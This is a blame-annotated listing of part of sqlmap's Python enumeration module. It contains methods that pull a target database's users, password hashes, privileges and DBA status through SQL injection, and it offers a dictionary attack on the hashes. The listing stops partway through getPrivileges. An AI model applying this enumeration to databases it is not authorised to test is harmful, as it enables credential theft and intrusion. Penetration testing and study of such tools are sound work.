2008-10-15 19:38:22 +04:00
|
|
|
#!/usr/bin/env python
|
|
|
|
|
|
|
|
"""
|
2008-10-15 19:56:32 +04:00
|
|
|
$Id$
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-04-15 16:33:18 +04:00
|
|
|
Copyright (c) 2006-2011 sqlmap developers (http://sqlmap.sourceforge.net/)
|
2010-10-15 03:18:29 +04:00
|
|
|
See the file 'doc/COPYING' for copying permission
|
2008-10-15 19:38:22 +04:00
|
|
|
"""
|
|
|
|
|
|
|
|
import re
|
2010-09-30 16:35:45 +04:00
|
|
|
import time
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
from lib.core.agent import agent
|
2010-12-22 21:55:50 +03:00
|
|
|
from lib.core.common import arrayizeValue
|
2011-01-28 19:36:09 +03:00
|
|
|
from lib.core.common import Backend
|
2010-09-30 16:35:45 +04:00
|
|
|
from lib.core.common import dataToStdout
|
2008-10-15 19:38:22 +04:00
|
|
|
from lib.core.common import getRange
|
2010-08-31 18:31:17 +04:00
|
|
|
from lib.core.common import getCompiledRegex
|
2010-09-30 16:35:45 +04:00
|
|
|
from lib.core.common import getFileItems
|
2011-01-28 19:36:09 +03:00
|
|
|
from lib.core.common import Backend
|
2010-06-02 16:45:40 +04:00
|
|
|
from lib.core.common import getUnicode
|
2011-05-22 13:48:46 +04:00
|
|
|
from lib.core.common import isNoneValue
|
2010-12-02 21:57:43 +03:00
|
|
|
from lib.core.common import isNumPosStrValue
|
2010-12-18 18:57:47 +03:00
|
|
|
from lib.core.common import isTechniqueAvailable
|
2008-10-15 19:38:22 +04:00
|
|
|
from lib.core.common import parsePasswordHash
|
2010-12-12 01:00:16 +03:00
|
|
|
from lib.core.common import parseSqliteTableSchema
|
2010-09-30 16:35:45 +04:00
|
|
|
from lib.core.common import popValue
|
|
|
|
from lib.core.common import pushValue
|
2010-10-26 01:43:13 +04:00
|
|
|
from lib.core.common import randomStr
|
2009-04-22 15:48:07 +04:00
|
|
|
from lib.core.common import readInput
|
2010-05-07 17:40:57 +04:00
|
|
|
from lib.core.common import safeStringFormat
|
2011-03-30 01:54:15 +04:00
|
|
|
from lib.core.common import safeSQLIdentificatorNaming
|
2011-06-08 18:35:23 +04:00
|
|
|
from lib.core.common import singleTimeWarnMessage
|
2010-10-27 01:35:30 +04:00
|
|
|
from lib.core.common import strToHex
|
2011-03-07 12:50:43 +03:00
|
|
|
from lib.core.common import unArrayizeValue
|
2011-03-30 01:54:15 +04:00
|
|
|
from lib.core.common import unsafeSQLIdentificatorNaming
|
2011-04-15 00:38:03 +04:00
|
|
|
from lib.core.convert import safechardecode
|
2010-05-28 20:43:04 +04:00
|
|
|
from lib.core.convert import utf8decode
|
2008-10-15 19:38:22 +04:00
|
|
|
from lib.core.data import conf
|
|
|
|
from lib.core.data import kb
|
|
|
|
from lib.core.data import logger
|
2010-09-30 23:45:23 +04:00
|
|
|
from lib.core.data import paths
|
2008-10-15 19:38:22 +04:00
|
|
|
from lib.core.data import queries
|
2011-02-19 17:07:08 +03:00
|
|
|
from lib.core.dicts import firebirdTypes
|
2011-03-09 14:37:37 +03:00
|
|
|
from lib.core.dicts import mysqlPrivs
|
|
|
|
from lib.core.dicts import pgsqlPrivs
|
|
|
|
from lib.core.dicts import firebirdPrivs
|
2010-11-08 12:20:02 +03:00
|
|
|
from lib.core.enums import DBMS
|
2010-12-10 16:04:36 +03:00
|
|
|
from lib.core.enums import EXPECTED
|
2010-12-18 18:57:47 +03:00
|
|
|
from lib.core.enums import PAYLOAD
|
2011-01-04 16:23:59 +03:00
|
|
|
from lib.core.exception import sqlmapConnectionException
|
2008-10-15 19:38:22 +04:00
|
|
|
from lib.core.exception import sqlmapMissingMandatoryOptionException
|
|
|
|
from lib.core.exception import sqlmapNoneDataException
|
|
|
|
from lib.core.exception import sqlmapUnsupportedFeatureException
|
2010-09-30 23:45:23 +04:00
|
|
|
from lib.core.exception import sqlmapUserQuitException
|
2009-04-22 15:48:07 +04:00
|
|
|
from lib.core.session import setOs
|
2011-02-15 03:28:27 +03:00
|
|
|
from lib.core.settings import CONCAT_ROW_DELIMITER
|
|
|
|
from lib.core.settings import CONCAT_VALUE_DELIMITER
|
2011-03-27 11:58:15 +04:00
|
|
|
from lib.core.settings import DEFAULT_MSSQL_SCHEMA
|
2011-04-11 15:59:02 +04:00
|
|
|
from lib.core.settings import MAX_INT
|
2008-12-19 23:09:46 +03:00
|
|
|
from lib.core.settings import SQL_STATEMENTS
|
2008-10-15 19:38:22 +04:00
|
|
|
from lib.core.shell import autoCompletion
|
2008-11-02 21:17:12 +03:00
|
|
|
from lib.core.unescaper import unescaper
|
2011-01-07 19:39:47 +03:00
|
|
|
from lib.core.threads import getCurrentThreadData
|
2008-11-17 20:41:02 +03:00
|
|
|
from lib.parse.banner import bannerParser
|
2008-10-15 19:38:22 +04:00
|
|
|
from lib.request import inject
|
2010-09-30 16:35:45 +04:00
|
|
|
from lib.request.connect import Connect as Request
|
2010-11-11 20:09:31 +03:00
|
|
|
from lib.techniques.brute.use import columnExists
|
2010-11-09 12:42:43 +03:00
|
|
|
from lib.techniques.brute.use import tableExists
|
2010-12-27 13:56:28 +03:00
|
|
|
from lib.utils.hash import attackDumpedTable
|
|
|
|
from lib.utils.hash import attackCachedUsersPasswords
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
class Enumeration:
|
|
|
|
"""
|
|
|
|
This class defines generic enumeration functionalities for plugins.
|
|
|
|
"""
|
|
|
|
|
2011-01-14 14:55:20 +03:00
|
|
|
def __init__(self):
|
2009-04-22 15:48:07 +04:00
|
|
|
kb.data.has_information_schema = False
|
2011-04-30 17:20:05 +04:00
|
|
|
kb.data.banner = None
|
|
|
|
kb.data.currentUser = ""
|
|
|
|
kb.data.currentDb = ""
|
|
|
|
kb.data.cachedUsers = []
|
|
|
|
kb.data.cachedUsersPasswords = {}
|
|
|
|
kb.data.cachedUsersPrivileges = {}
|
|
|
|
kb.data.cachedUsersRoles = {}
|
|
|
|
kb.data.cachedDbs = []
|
|
|
|
kb.data.cachedTables = {}
|
|
|
|
kb.data.cachedColumns = {}
|
|
|
|
kb.data.cachedCounts = {}
|
|
|
|
kb.data.dumpedTable = {}
|
|
|
|
kb.data.processChar = None
|
|
|
|
self.alwaysRetrieveSqlOutput = False
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
def getBanner(self):
|
2009-04-22 15:48:07 +04:00
|
|
|
if not conf.getBanner:
|
|
|
|
return
|
|
|
|
|
2010-12-27 19:55:27 +03:00
|
|
|
if kb.data.banner is None:
|
|
|
|
infoMsg = "fetching banner"
|
|
|
|
logger.info(infoMsg)
|
2010-03-04 17:23:52 +03:00
|
|
|
|
2011-05-06 14:27:43 +04:00
|
|
|
query = queries[Backend.getIdentifiedDbms()].banner.query
|
|
|
|
kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=False))
|
2009-04-22 15:48:07 +04:00
|
|
|
bannerParser(kb.data.banner)
|
|
|
|
|
2010-12-27 19:55:27 +03:00
|
|
|
if conf.os and conf.os == "windows":
|
|
|
|
kb.bannerFp["type"] = set([ "Windows" ])
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2010-12-27 19:55:27 +03:00
|
|
|
elif conf.os and conf.os == "linux":
|
|
|
|
kb.bannerFp["type"] = set([ "Linux" ])
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-12-27 19:55:27 +03:00
|
|
|
elif conf.os:
|
|
|
|
kb.bannerFp["type"] = set([ "%s%s" % (conf.os[0].upper(), conf.os[1:]) ])
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-01-02 11:01:01 +03:00
|
|
|
if conf.os:
|
|
|
|
setOs()
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
return kb.data.banner
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
def getCurrentUser(self):
|
2008-11-12 03:36:50 +03:00
|
|
|
infoMsg = "fetching current user"
|
|
|
|
logger.info(infoMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
query = queries[Backend.getIdentifiedDbms()].current_user.query
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
if not kb.data.currentUser:
|
2011-03-07 12:50:43 +03:00
|
|
|
kb.data.currentUser = unArrayizeValue(inject.getValue(query))
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
return kb.data.currentUser
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
def getCurrentDb(self):
|
2008-11-12 03:36:50 +03:00
|
|
|
infoMsg = "fetching current database"
|
|
|
|
logger.info(infoMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
query = queries[Backend.getIdentifiedDbms()].current_db.query
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
if not kb.data.currentDb:
|
2011-04-15 12:15:21 +04:00
|
|
|
kb.data.currentDb = unArrayizeValue(inject.getValue(query, safeCharEncode=False))
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
return kb.data.currentDb
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-02-10 17:24:04 +03:00
|
|
|
def isDba(self, user=None):
|
2008-12-18 23:41:11 +03:00
|
|
|
infoMsg = "testing if current user is DBA"
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL):
|
2010-12-22 17:06:01 +03:00
|
|
|
self.getCurrentUser()
|
2011-04-01 15:14:24 +04:00
|
|
|
query = queries[Backend.getIdentifiedDbms()].is_dba.query % (kb.data.currentUser.split("@")[0] if kb.data.currentUser else None)
|
2011-02-20 20:28:06 +03:00
|
|
|
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and user is not None:
|
2011-02-10 17:24:04 +03:00
|
|
|
query = queries[Backend.getIdentifiedDbms()].is_dba.query2 % user
|
2010-12-22 17:06:01 +03:00
|
|
|
else:
|
2011-01-28 19:36:09 +03:00
|
|
|
query = queries[Backend.getIdentifiedDbms()].is_dba.query
|
2010-12-22 17:06:01 +03:00
|
|
|
|
|
|
|
query = agent.forgeCaseStatement(query)
|
2011-02-21 19:00:56 +03:00
|
|
|
isDba = inject.getValue(query, charsetType=1)
|
2008-12-18 23:41:11 +03:00
|
|
|
|
2011-02-10 17:24:04 +03:00
|
|
|
if user is None:
|
2011-03-07 12:50:43 +03:00
|
|
|
kb.data.isDba = unArrayizeValue(isDba)
|
2008-12-18 23:41:11 +03:00
|
|
|
|
2011-02-10 17:24:04 +03:00
|
|
|
return isDba == "1"
|
2008-12-18 23:41:11 +03:00
|
|
|
|
2008-10-15 19:38:22 +04:00
|
|
|
def getUsers(self):
|
2008-11-12 03:36:50 +03:00
|
|
|
infoMsg = "fetching database users"
|
|
|
|
logger.info(infoMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
rootQuery = queries[Backend.getIdentifiedDbms()].users
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
condition = ( Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")) )
|
|
|
|
condition |= ( Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema )
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-01-19 02:02:11 +03:00
|
|
|
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
|
2008-10-15 19:38:22 +04:00
|
|
|
if condition:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.inband.query2
|
2008-10-15 19:38:22 +04:00
|
|
|
else:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.inband.query
|
2011-01-19 02:02:11 +03:00
|
|
|
value = inject.getValue(query, blind=False)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-05-26 12:17:21 +04:00
|
|
|
if not isNoneValue(value):
|
2010-12-22 21:55:50 +03:00
|
|
|
kb.data.cachedUsers = arrayizeValue(value)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-03-31 14:50:47 +04:00
|
|
|
if not kb.data.cachedUsers and not conf.direct:
|
2008-11-12 03:36:50 +03:00
|
|
|
infoMsg = "fetching number of database users"
|
|
|
|
logger.info(infoMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
if condition:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.count2
|
2008-10-15 19:38:22 +04:00
|
|
|
else:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.count
|
2011-01-19 02:02:11 +03:00
|
|
|
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-12-02 21:57:43 +03:00
|
|
|
if not isNumPosStrValue(count):
|
2008-10-15 19:38:22 +04:00
|
|
|
errMsg = "unable to retrieve the number of database users"
|
|
|
|
raise sqlmapNoneDataException, errMsg
|
|
|
|
|
2011-05-06 14:27:43 +04:00
|
|
|
if Backend.isDbms(DBMS.ORACLE):
|
2010-01-09 03:05:00 +03:00
|
|
|
plusOne = True
|
|
|
|
else:
|
|
|
|
plusOne = False
|
|
|
|
indexRange = getRange(count, plusOne=plusOne)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
for index in indexRange:
|
2011-01-28 19:36:09 +03:00
|
|
|
if Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MAXDB):
|
2010-10-26 02:11:38 +04:00
|
|
|
query = rootQuery.blind.query % (kb.data.cachedUsers[-1] if kb.data.cachedUsers else " ")
|
2010-10-26 01:43:13 +04:00
|
|
|
elif condition:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.query2 % index
|
2008-10-15 19:38:22 +04:00
|
|
|
else:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.query % index
|
2011-01-19 02:02:11 +03:00
|
|
|
user = inject.getValue(query, inband=False, error=False)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
if user:
|
2009-04-22 15:48:07 +04:00
|
|
|
kb.data.cachedUsers.append(user)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
if not kb.data.cachedUsers:
|
2008-10-15 19:38:22 +04:00
|
|
|
errMsg = "unable to retrieve the database users"
|
|
|
|
raise sqlmapNoneDataException, errMsg
|
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
return kb.data.cachedUsers
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
def getPasswordHashes(self):
|
2008-11-12 03:36:50 +03:00
|
|
|
infoMsg = "fetching database users password hashes"
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
rootQuery = queries[Backend.getIdentifiedDbms()].passwords
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2008-12-05 18:32:59 +03:00
|
|
|
if conf.user == "CU":
|
|
|
|
infoMsg += " for current user"
|
|
|
|
conf.user = self.getCurrentUser()
|
|
|
|
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
2011-04-30 18:50:27 +04:00
|
|
|
if conf.user and Backend.isDbms(DBMS.ORACLE):
|
|
|
|
conf.user = conf.user.upper()
|
|
|
|
|
|
|
|
if conf.user:
|
|
|
|
users = conf.user.split(",")
|
|
|
|
|
|
|
|
if Backend.isDbms(DBMS.MYSQL):
|
|
|
|
for user in users:
|
|
|
|
parsedUser = re.search("[\047]*(.*?)[\047]*\@", user)
|
|
|
|
|
|
|
|
if parsedUser:
|
|
|
|
users[users.index(user)] = parsedUser.groups()[0]
|
|
|
|
else:
|
|
|
|
users = []
|
|
|
|
|
2011-01-19 02:02:11 +03:00
|
|
|
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.inband.query2
|
2008-10-15 19:38:22 +04:00
|
|
|
else:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.inband.query
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-10-21 17:13:12 +04:00
|
|
|
condition = rootQuery.inband.condition
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
if conf.user:
|
2011-04-30 18:50:27 +04:00
|
|
|
query += " WHERE "
|
|
|
|
query += " OR ".join("%s = '%s'" % (condition, user) for user in users)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.SYBASE):
|
2011-02-20 15:07:32 +03:00
|
|
|
randStr = randomStr()
|
|
|
|
getCurrentThreadData().disableStdOut = True
|
2011-04-15 01:11:20 +04:00
|
|
|
|
2011-02-20 15:07:32 +03:00
|
|
|
retVal = self.__pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr,'%s.password' % randStr], blind=False)
|
2011-04-30 18:50:27 +04:00
|
|
|
|
2011-02-20 15:07:32 +03:00
|
|
|
if retVal:
|
|
|
|
for user, password in zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr]):
|
2011-04-30 18:50:27 +04:00
|
|
|
# password = "0x%s" % strToHex(password)
|
2011-02-20 15:07:32 +03:00
|
|
|
if not kb.data.cachedUsersPasswords.has_key(user):
|
|
|
|
kb.data.cachedUsersPasswords[user] = [password]
|
|
|
|
else:
|
|
|
|
kb.data.cachedUsersPasswords[user].append(password)
|
2011-04-15 01:11:20 +04:00
|
|
|
|
2011-02-20 15:07:32 +03:00
|
|
|
getCurrentThreadData().disableStdOut = False
|
|
|
|
else:
|
|
|
|
value = inject.getValue(query, blind=False)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-05-26 12:17:21 +04:00
|
|
|
if not isNoneValue(value):
|
2011-02-20 19:00:13 +03:00
|
|
|
for user, password in value:
|
|
|
|
if not user or user == " ":
|
|
|
|
continue
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-02-20 19:00:13 +03:00
|
|
|
password = parsePasswordHash(password)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-02-20 19:00:13 +03:00
|
|
|
if not kb.data.cachedUsersPasswords.has_key(user):
|
|
|
|
kb.data.cachedUsersPasswords[user] = [password]
|
|
|
|
else:
|
|
|
|
kb.data.cachedUsersPasswords[user].append(password)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-03-31 14:50:47 +04:00
|
|
|
if not kb.data.cachedUsersPasswords and not conf.direct:
|
2011-04-30 18:50:27 +04:00
|
|
|
if not len(users):
|
|
|
|
users = self.getUsers()
|
|
|
|
|
|
|
|
if Backend.isDbms(DBMS.MYSQL):
|
|
|
|
for user in users:
|
|
|
|
parsedUser = re.search("[\047]*(.*?)[\047]*\@", user)
|
|
|
|
|
|
|
|
if parsedUser:
|
|
|
|
users[users.index(user)] = parsedUser.groups()[0]
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.SYBASE):
|
2011-02-20 19:00:13 +03:00
|
|
|
getCurrentThreadData().disableStdOut = True
|
|
|
|
|
2011-02-20 15:07:32 +03:00
|
|
|
randStr = randomStr()
|
|
|
|
query = rootQuery.inband.query
|
2011-02-20 19:00:13 +03:00
|
|
|
|
2011-02-20 15:07:32 +03:00
|
|
|
retVal = self.__pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr,'%s.password' % randStr], blind=True)
|
2011-04-30 18:50:27 +04:00
|
|
|
|
2011-02-20 15:07:32 +03:00
|
|
|
if retVal:
|
|
|
|
for user, password in zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr]):
|
|
|
|
password = "0x%s" % strToHex(password)
|
2011-04-30 18:50:27 +04:00
|
|
|
|
2011-02-20 15:07:32 +03:00
|
|
|
if not kb.data.cachedUsersPasswords.has_key(user):
|
|
|
|
kb.data.cachedUsersPasswords[user] = [password]
|
|
|
|
else:
|
|
|
|
kb.data.cachedUsersPasswords[user].append(password)
|
|
|
|
|
2011-02-20 19:00:13 +03:00
|
|
|
getCurrentThreadData().disableStdOut = False
|
|
|
|
else:
|
|
|
|
retrievedUsers = set()
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-02-20 19:00:13 +03:00
|
|
|
for user in users:
|
2011-04-30 18:50:27 +04:00
|
|
|
if user in retrievedUsers:
|
2011-02-20 19:00:13 +03:00
|
|
|
continue
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-04-30 17:20:05 +04:00
|
|
|
infoMsg = "fetching number of password hashes "
|
2011-02-20 19:00:13 +03:00
|
|
|
infoMsg += "for user '%s'" % user
|
|
|
|
logger.info(infoMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
|
2011-02-20 19:00:13 +03:00
|
|
|
query = rootQuery.blind.count2 % user
|
|
|
|
else:
|
|
|
|
query = rootQuery.blind.count % user
|
|
|
|
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-02-20 19:00:13 +03:00
|
|
|
if not isNumPosStrValue(count):
|
2011-04-30 17:20:05 +04:00
|
|
|
warnMsg = "unable to retrieve the number of password "
|
2011-02-20 19:00:13 +03:00
|
|
|
warnMsg += "hashes for user '%s'" % user
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
continue
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-02-20 19:00:13 +03:00
|
|
|
infoMsg = "fetching password hashes for user '%s'" % user
|
|
|
|
logger.info(infoMsg)
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2011-04-30 17:20:05 +04:00
|
|
|
passwords = []
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.ORACLE):
|
2011-02-20 19:00:13 +03:00
|
|
|
plusOne = True
|
2008-10-15 19:38:22 +04:00
|
|
|
else:
|
2011-02-20 19:00:13 +03:00
|
|
|
plusOne = False
|
|
|
|
indexRange = getRange(count, plusOne=plusOne)
|
|
|
|
|
|
|
|
for index in indexRange:
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MSSQL):
|
2011-02-20 19:00:13 +03:00
|
|
|
if Backend.isVersionWithin(("2005", "2008")):
|
|
|
|
query = rootQuery.blind.query2 % (user, index, user)
|
|
|
|
else:
|
|
|
|
query = rootQuery.blind.query % (user, index, user)
|
|
|
|
else:
|
|
|
|
query = rootQuery.blind.query % (user, index)
|
|
|
|
password = inject.getValue(query, inband=False, error=False)
|
|
|
|
password = parsePasswordHash(password)
|
|
|
|
passwords.append(password)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-02-20 19:00:13 +03:00
|
|
|
if passwords:
|
|
|
|
kb.data.cachedUsersPasswords[user] = passwords
|
|
|
|
else:
|
2011-04-30 17:20:05 +04:00
|
|
|
warnMsg = "unable to retrieve the password "
|
2011-02-20 19:00:13 +03:00
|
|
|
warnMsg += "hashes for user '%s'" % user
|
|
|
|
logger.warn(warnMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-02-20 19:00:13 +03:00
|
|
|
retrievedUsers.add(user)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
if not kb.data.cachedUsersPasswords:
|
2011-06-08 15:33:45 +04:00
|
|
|
errMsg = "unable to retrieve the password hashes for the "
|
|
|
|
errMsg += "database users (most probably because the session "
|
|
|
|
errMsg += "user has no read privileges over the relevant "
|
|
|
|
errMsg += "system database table)"
|
2008-10-15 19:38:22 +04:00
|
|
|
raise sqlmapNoneDataException, errMsg
|
|
|
|
|
2010-11-23 16:24:02 +03:00
|
|
|
message = "do you want to use dictionary attack on retrieved password hashes? [Y/n/q]"
|
|
|
|
test = readInput(message, default="Y")
|
|
|
|
|
|
|
|
if test[0] in ("n", "N"):
|
|
|
|
pass
|
|
|
|
elif test[0] in ("q", "Q"):
|
|
|
|
raise sqlmapUserQuitException
|
|
|
|
else:
|
2010-12-27 13:56:28 +03:00
|
|
|
attackCachedUsersPasswords()
|
2010-11-23 16:24:02 +03:00
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
return kb.data.cachedUsersPasswords
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
def __isAdminFromPrivileges(self, privileges):
|
|
|
|
# In PostgreSQL the usesuper privilege means that the
|
|
|
|
# user is DBA
|
2011-04-30 18:54:29 +04:00
|
|
|
dbaCondition = ( Backend.isDbms(DBMS.PGSQL) and "super" in privileges )
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
# In Oracle the DBA privilege means that the
|
|
|
|
# user is DBA
|
2011-04-30 18:54:29 +04:00
|
|
|
dbaCondition |= ( Backend.isDbms(DBMS.ORACLE) and "DBA" in privileges )
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
# In MySQL >= 5.0 the SUPER privilege means
|
|
|
|
# that the user is DBA
|
2011-04-30 18:54:29 +04:00
|
|
|
dbaCondition |= ( Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema and "SUPER" in privileges )
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
# In MySQL < 5.0 the super_priv privilege means
|
|
|
|
# that the user is DBA
|
2011-04-30 18:54:29 +04:00
|
|
|
dbaCondition |= ( Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema and "super_priv" in privileges )
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-03-25 18:46:06 +03:00
|
|
|
# In Firebird there is no specific privilege that means
|
|
|
|
# that the user is DBA
|
|
|
|
# TODO: confirm
|
2011-04-30 18:54:29 +04:00
|
|
|
dbaCondition |= ( Backend.isDbms(DBMS.FIREBIRD) and "SELECT" in privileges and "INSERT" in privileges and "UPDATE" in privileges and "DELETE" in privileges and "REFERENCES" in privileges and "EXECUTE" in privileges )
|
2010-03-25 18:46:06 +03:00
|
|
|
|
2008-10-15 19:38:22 +04:00
|
|
|
return dbaCondition
|
|
|
|
|
2010-03-25 18:46:06 +03:00
|
|
|
def getPrivileges(self, query2=False):
|
2008-11-12 03:36:50 +03:00
|
|
|
infoMsg = "fetching database users privileges"
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
rootQuery = queries[Backend.getIdentifiedDbms()].privileges
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2008-12-05 18:32:59 +03:00
|
|
|
if conf.user == "CU":
|
|
|
|
infoMsg += " for current user"
|
|
|
|
conf.user = self.getCurrentUser()
|
|
|
|
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
2011-05-06 14:27:43 +04:00
|
|
|
if conf.user and Backend.isDbms(DBMS.ORACLE):
|
2011-04-30 18:50:27 +04:00
|
|
|
conf.user = conf.user.upper()
|
|
|
|
|
|
|
|
if conf.user:
|
|
|
|
users = conf.user.split(",")
|
|
|
|
|
|
|
|
if Backend.isDbms(DBMS.MYSQL):
|
|
|
|
for user in users:
|
|
|
|
parsedUser = re.search("[\047]*(.*?)[\047]*\@", user)
|
|
|
|
|
|
|
|
if parsedUser:
|
|
|
|
users[users.index(user)] = parsedUser.groups()[0]
|
|
|
|
else:
|
|
|
|
users = []
|
|
|
|
|
2008-10-15 19:38:22 +04:00
|
|
|
# Set containing the list of DBMS administrators
|
|
|
|
areAdmins = set()
|
|
|
|
|
2011-01-19 02:02:11 +03:00
|
|
|
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2011-04-30 17:20:05 +04:00
|
|
|
query = rootQuery.inband.query2
|
2010-10-21 17:13:12 +04:00
|
|
|
condition = rootQuery.inband.condition2
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.ORACLE) and query2:
|
2011-04-30 17:20:05 +04:00
|
|
|
query = rootQuery.inband.query2
|
2010-10-21 17:13:12 +04:00
|
|
|
condition = rootQuery.inband.condition2
|
2008-10-15 19:38:22 +04:00
|
|
|
else:
|
2011-04-30 17:20:05 +04:00
|
|
|
query = rootQuery.inband.query
|
2010-10-21 17:13:12 +04:00
|
|
|
condition = rootQuery.inband.condition
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
if conf.user:
|
2010-03-25 18:46:06 +03:00
|
|
|
query += " WHERE "
|
2011-04-30 18:50:27 +04:00
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
|
2011-04-30 18:50:27 +04:00
|
|
|
query += " OR ".join("%s LIKE '%%%s%%'" % (condition, user) for user in users)
|
2008-10-15 19:38:22 +04:00
|
|
|
